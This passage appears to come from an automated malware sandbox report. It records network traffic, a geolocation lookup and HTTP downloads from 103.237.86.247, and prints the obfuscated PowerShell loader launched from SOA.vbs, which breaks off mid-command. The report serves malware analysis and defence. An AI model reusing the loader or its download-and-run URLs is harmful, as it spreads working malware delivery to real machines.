                    Jul 2, 2024 07:50:57.032835960 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032841921 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.032851934 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032877922 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033771992 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033782959 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033795118 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033807993 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033816099 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033827066 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033833981 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033845901 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033865929 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034708023 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034718990 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034730911 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034748077 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034753084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034765005 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034776926 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034804106 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035696983 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035708904 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035720110 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035732985 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035739899 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035752058 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035763979 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035774946 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035782099 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035820007 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.036699057 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036710978 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036722898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036736012 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036746979 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.036755085 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036767006 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036791086 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037657976 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037672043 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037683010 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037693977 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037702084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037714958 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037728071 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037763119 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038630009 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038642883 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038654089 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038666010 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038681984 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038688898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038702011 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038711071 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038718939 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038738966 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039736032 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039748907 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039760113 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039772987 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039781094 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039791107 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039800882 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039808989 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039829016 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040644884 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040657997 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040672064 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040687084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040692091 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040700912 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040709019 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040719032 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040745020 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041522980 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041534901 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041546106 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041558027 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041569948 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041583061 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041594028 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041601896 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041625977 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042422056 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042433977 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042445898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042457104 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042465925 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042483091 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042490005 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042501926 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042522907 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042985916 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043271065 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043282986 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043299913 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043309927 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043319941 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043333054 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043340921 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043350935 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043370008 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044168949 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044182062 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044193983 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044208050 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044214964 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044226885 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044234991 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044244051 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044251919 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.045047998 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045059919 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045072079 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045089006 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.045108080 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.048568964 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116019011 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116048098 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116059065 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116087914 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116209030 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116220951 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116233110 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116244078 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116252899 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116272926 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.158997059 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287389994 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287435055 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287448883 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287482023 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287765980 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287780046 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287791967 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287806034 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287813902 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287834883 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.288398027 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288409948 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288422108 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288434982 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288444996 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.288466930 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.330921888 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.140585899 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145694971 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145714998 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145725965 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145735025 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145742893 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145752907 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145761967 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145776987 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145793915 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145802975 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145816088 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145925999 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.151932001 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152017117 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152026892 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152038097 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152045965 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152077913 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.153681993 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.232712984 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.237894058 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.237955093 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:03.370800018 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:03.372072935 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:03.377171040 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:06.012656927 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:51:33.380379915 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:33.381941080 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:33.386830091 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:52:03.392513037 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:52:03.395106077 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:52:03.399916887 CEST199949708103.237.87.32192.168.2.7
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 2, 2024 07:50:52.726406097 CEST | 53238 | 53 | 192.168.2.7 | 1.1.1.1
                    Jul 2, 2024 07:50:52.733591080 CEST | 53 | 53238 | 1.1.1.1 | 192.168.2.7
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jul 2, 2024 07:50:52.726406097 CEST | 192.168.2.7 | 1.1.1.1 | 0x26c8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jul 2, 2024 07:50:52.733591080 CEST | 1.1.1.1 | 192.168.2.7 | 0x26c8 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                    • 103.237.86.247
                    • geoplugin.net
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.7 | 49700 | 103.237.86.247 | 80 | 720 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 2, 2024 07:50:06.081440926 CEST | 171 | OUT | GET /Teentsier.lpk HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: 103.237.86.247
                    Connection: Keep-Alive
                    Jul 2, 2024 07:50:07.757395983 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660
                    Jul 2, 2024 07:50:07.757716894 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660
                    Jul 2, 2024 07:50:07.758057117 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.7 | 49707 | 103.237.86.247 | 80 | 7732 | C:\Program Files (x86)\Windows Mail\wab.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 2, 2024 07:50:46.177380085 CEST | 176 | OUT | GET /mbLXhRfFSSN77.bin HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: 103.237.86.247
                    Cache-Control: no-cache
                    Jul 2, 2024 07:50:47.356218100 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:38:33 GMT
                    Accept-Ranges: bytes
                    ETag: "559e3ac89cbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:41 GMT
                    Content-Length: 494656


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.7 | 49710 | 178.237.33.50 | 80 | 7732 | C:\Program Files (x86)\Windows Mail\wab.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 2, 2024 07:50:52.749238014 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                    Host: geoplugin.net
                    Cache-Control: no-cache
                    Jul 2, 2024 07:50:53.370238066 CEST | 1170 | IN | HTTP/1.1 200 OK
                    date: Tue, 02 Jul 2024 05:50:53 GMT
                    server: Apache
                    content-length: 962
                    content-type: application/json; charset=utf-8
                    cache-control: public, max-age=300
                    access-control-allow-origin: *
                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                    Target ID:0
                    Start time:01:50:00
                    Start date:02/07/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                    Imagebase:0x7ff776ec0000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:01:50:03
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: 
Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. 
');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. 
maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT 
